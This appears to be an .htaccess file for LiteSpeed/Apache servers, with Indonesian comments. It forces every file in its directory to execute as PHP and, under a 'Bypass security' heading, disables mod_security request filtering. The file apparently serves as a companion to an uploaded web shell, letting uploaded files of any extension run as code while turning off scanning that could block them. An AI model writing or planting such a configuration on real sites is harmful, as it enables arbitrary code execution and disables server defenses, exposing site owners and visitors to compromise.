<IfModule LiteSpeed>
    RemoveHandler .php .php3 .php4 .php5 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi
    RemoveType .php .php3 .php4 .php5 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi
    
    # Force execution sebagai PHP
    <FilesMatch "\.(php|phtml|php3|php4|php5|phps|inc)$">
        SetHandler application/x-httpd-php
    </FilesMatch>
    
    # Atau untuk semua file
    <Files *>
        SetHandler application/x-httpd-php
    </Files>
</IfModule>

# Bypass security
SecFilterEngine Off
SecFilterScanPOST Off
